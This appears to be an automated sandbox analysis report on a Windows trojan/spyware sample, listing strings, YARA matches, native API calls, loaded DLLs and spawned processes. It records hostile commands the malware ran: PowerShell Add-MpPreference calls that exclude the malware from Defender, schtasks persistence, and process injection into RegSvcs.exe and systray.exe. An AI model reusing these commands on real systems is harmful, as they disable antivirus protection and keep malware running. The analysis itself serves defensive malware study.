                Source: systray.exe, 00000017.00000002.2508850216.0000000003564000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: systray.exe, 00000017.00000002.2508850216.0000000003564000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: systray.exe, 00000017.00000002.2508850216.0000000003564000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: systray.exe, 00000017.00000002.2508850216.0000000003540000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033p
                Source: systray.exe, 00000017.00000002.2508850216.0000000003564000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: systray.exe, 00000017.00000002.2508850216.0000000003564000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: systray.exe, 00000017.00000003.1757735617.00000000083BD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                Source: n2pGr8w21V.exe, uEugNEto.exe.0.dr | String found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0
                Source: systray.exe, 00000017.00000002.2514817547.00000000083DB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/

                E-Banking Fraud

                Source: Yara match | File source: 15.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 15.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000017.00000002.2508381600.00000000034A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000F.00000002.1575119582.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000018.00000002.2513591894.0000000004CD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000017.00000002.2511826108.0000000004DB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000F.00000002.1576124904.0000000001470000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000017.00000002.2507252400.0000000003200000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000016.00000002.2511173788.0000000003760000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000F.00000002.1578348944.00000000022B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 15_2_0042C7C3 NtClose
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 15_2_015D2B60 NtClose, LdrInitializeThunk
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 15_2_015D2DF0 NtQuerySystemInformation, LdrInitializeThunk
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 15_2_015D2C70 NtFreeVirtualMemory, LdrInitializeThunk
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 15_2_015D35C0 NtCreateMutant, LdrInitializeThunk
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 15_2_015D4340 NtSetContextThread
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 15_2_015D4650 NtSuspendThread
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 15_2_015D2BF0 NtAllocateVirtualMemory
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 15_2_015D2BE0 NtQueryValueKey
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 15_2_015D2B80 NtQueryInformationFile
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 15_2_015D2BA0 NtEnumerateValueKey
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 15_2_015D2AD0 NtReadFile
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 15_2_015D2AF0 NtWriteFile
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 15_2_015D2AB0 NtWaitForSingleObject
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 15_2_015D2D10 NtMapViewOfSection
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 15_2_015D2D00 NtSetInformationFile
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 15_2_015D2D30 NtUnmapViewOfSection
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 15_2_015D2DD0 NtDelayExecution
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 15_2_015D2DB0 NtEnumerateKey
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 15_2_015D2C60 NtCreateKey
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 15_2_015D2C00 NtQueryInformationProcess
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 15_2_015D2CC0 NtQueryVirtualMemory
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 15_2_015D2CF0 NtOpenProcess
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 15_2_015D2CA0 NtQueryInformationToken
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 15_2_015D2F60 NtCreateProcessEx
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 15_2_015D2F30 NtCreateSection
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 15_2_015D2FE0 NtCreateFile
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 15_2_015D2F90 NtProtectVirtualMemory
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 15_2_015D2FB0 NtResumeThread
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 15_2_015D2FA0 NtQuerySection
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 15_2_015D2E30 NtWriteVirtualMemory
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 15_2_015D2EE0 NtQueueApcThread
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 15_2_015D2E80 NtReadVirtualMemory
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 15_2_015D2EA0 NtAdjustPrivilegesToken
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 15_2_015D3010 NtOpenDirectoryObject
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 15_2_015D3090 NtSetValueKey
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 15_2_015D39B0 NtGetContextThread
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 15_2_015D3D70 NtOpenThread
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 15_2_015D3D10 NtOpenProcessToken
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: String function: 0143EA12 appears 37 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: String function: 0158B970 appears 275 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: String function: 015E7E54 appears 102 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: String function: 0161F290 appears 105 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: String function: 0160EA12 appears 86 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: String function: 01417E54 appears 97 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: String function: 015D5130 appears 58 times
                Source: n2pGr8w21V.exe Static PE information: invalid certificate
                Source: n2pGr8w21V.exe, 00000000.00000002.1376232222.0000000003F99000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMontero.dll8 vs n2pGr8w21V.exe
                Source: n2pGr8w21V.exe, 00000000.00000002.1379105487.0000000005790000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameArthur.dll" vs n2pGr8w21V.exe
                Source: n2pGr8w21V.exe, 00000000.00000002.1363113056.000000000100E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs n2pGr8w21V.exe
                Source: n2pGr8w21V.exe, 00000000.00000002.1379863877.0000000007370000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameMontero.dll8 vs n2pGr8w21V.exe
                Source: n2pGr8w21V.exe, 00000000.00000000.1258208011.0000000000A72000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameOavGB.exe: vs n2pGr8w21V.exe
                Source: n2pGr8w21V.exe, 00000000.00000002.1373842326.000000000303B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameArthur.dll" vs n2pGr8w21V.exe
                Source: n2pGr8w21V.exe Binary or memory string: OriginalFilenameOavGB.exe: vs n2pGr8w21V.exe
                Source: n2pGr8w21V.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: n2pGr8w21V.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: uEugNEto.exe.0.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@23/16@7/6
                Source: C:\Users\user\Desktop\n2pGr8w21V.exe File created: C:\Users\user\AppData\Roaming\uEugNEto.exe
                Source: C:\Users\user\AppData\Roaming\uEugNEto.exe Mutant created: NULL
                Source: C:\Users\user\AppData\Roaming\uEugNEto.exe Mutant created: \Sessions\1\BaseNamedObjects\BpfRQdg
                Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7448:120:WilError_03
                Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7540:120:WilError_03
                Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8092:120:WilError_03
                Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7488:120:WilError_03
                Source: C:\Users\user\Desktop\n2pGr8w21V.exe File created: C:\Users\user\AppData\Local\Temp\tmpB98D.tmp
                Source: n2pGr8w21V.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: n2pGr8w21V.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                Source: C:\Users\user\Desktop\n2pGr8w21V.exe File read: C:\Users\user\Desktop\desktop.ini
                Source: C:\Users\user\Desktop\n2pGr8w21V.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: systray.exe, 00000017.00000003.1758903710.00000000035A4000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000017.00000002.2508850216.00000000035A4000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000017.00000003.1758664954.0000000003583000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000017.00000002.2508850216.00000000035D1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: n2pGr8w21V.exe ReversingLabs: Detection: 68%
                Source: C:\Users\user\Desktop\n2pGr8w21V.exe File read: C:\Users\user\Desktop\n2pGr8w21V.exe
                Source: unknown Process created: C:\Users\user\Desktop\n2pGr8w21V.exe "C:\Users\user\Desktop\n2pGr8w21V.exe"
                Source: C:\Users\user\Desktop\n2pGr8w21V.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\n2pGr8w21V.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\n2pGr8w21V.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\uEugNEto.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\n2pGr8w21V.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uEugNEto" /XML "C:\Users\user\AppData\Local\Temp\tmpB98D.tmp"
                Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\n2pGr8w21V.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                Source: unknown Process created: C:\Users\user\AppData\Roaming\uEugNEto.exe C:\Users\user\AppData\Roaming\uEugNEto.exe
                Source: C:\Users\user\AppData\Roaming\uEugNEto.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uEugNEto" /XML "C:\Users\user\AppData\Local\Temp\tmpEA52.tmp"
                Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\AppData\Roaming\uEugNEto.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                Source: C:\Program Files (x86)\GFsImQVHNEQZxUwbhDneezFpyfJJaThlrIXiWSAPfvZayXrwZhkYUBnOQkx\ISaSZznjXcpoJ.exe Process created: C:\Windows\SysWOW64\systray.exe "C:\Windows\SysWOW64\systray.exe"
                Source: C:\Windows\SysWOW64\systray.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\n2pGr8w21V.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\n2pGr8w21V.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\n2pGr8w21V.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\n2pGr8w21V.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\n2pGr8w21V.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\n2pGr8w21V.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\n2pGr8w21V.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\n2pGr8w21V.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\n2pGr8w21V.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\n2pGr8w21V.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\n2pGr8w21V.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\n2pGr8w21V.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\n2pGr8w21V.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\n2pGr8w21V.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\n2pGr8w21V.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Users\user\Desktop\n2pGr8w21V.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\n2pGr8w21V.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\n2pGr8w21V.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\n2pGr8w21V.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\n2pGr8w21V.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\Desktop\n2pGr8w21V.exeSection loaded: textshaping.dllJump to behavior
                Source: C:\Users\user\Desktop\n2pGr8w21V.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\Desktop\n2pGr8w21V.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\Desktop\n2pGr8w21V.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\n2pGr8w21V.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\n2pGr8w21V.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\n2pGr8w21V.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\n2pGr8w21V.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\Desktop\n2pGr8w21V.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\n2pGr8w21V.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\n2pGr8w21V.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\Desktop\n2pGr8w21V.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\Desktop\n2pGr8w21V.exeSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\Desktop\n2pGr8w21V.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\Desktop\n2pGr8w21V.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\n2pGr8w21V.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\n2pGr8w21V.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
